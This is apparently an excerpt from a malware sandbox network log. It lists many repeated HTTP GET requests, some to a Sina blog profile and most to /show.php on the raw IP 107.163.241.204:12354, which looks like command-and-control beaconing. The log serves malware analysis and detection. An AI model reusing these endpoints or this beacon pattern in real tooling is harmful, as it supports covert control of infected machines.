Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
